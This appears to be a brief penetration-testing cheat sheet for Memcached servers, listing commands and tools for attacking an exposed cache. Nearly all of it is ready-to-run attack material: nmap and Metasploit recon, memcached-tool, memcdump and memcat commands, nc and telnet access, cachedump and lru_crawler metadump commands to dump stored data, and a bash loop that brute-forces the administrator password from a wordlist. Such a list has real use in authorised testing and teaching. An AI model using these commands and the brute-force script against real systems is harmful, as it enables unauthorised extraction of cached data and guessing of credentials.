Memcached
- Recon
Memcache uses by default the port: 11211
Nmap
Reconnaissance with nmap:
nmap -p 11211 --script memcached-info x.x.x.x
Metasploit
Module metasploit to find data stored in the cache:
auxiliary/gather/memcached_extractor
memcache-tool
# usr/share/memcached/scripts/memcached-tool memcached-tool 10.0.0.5:11211 dump
libmemcached-tools
memcstat --servers=x.x.x.x memcdump --servers=x.x.x.x memcat --servers=x.x.x.x key_to_retrieve
Login
telnet x.x.x.x 11211 echo -e 'stats items' | nc -q1 x.x.x.x 11211
Cache dump
stats slabs stats cachedump 1 100
Recover data from warm cache
lru_crawler metadump all
Brute force
#!/bin/bash while read p; do if memcstat --servers=x.x.x.x --username=administrator --password=$p | grep -q Server; then echo "Password found $p" break fi done < $1 # ./script.sh passwords.txt
- Memcached
- modern-lru
- Nmap Script: Memcached-info
- Metasploit Module: Memcached Extractor
- memcached-tool
- libmemcached-tools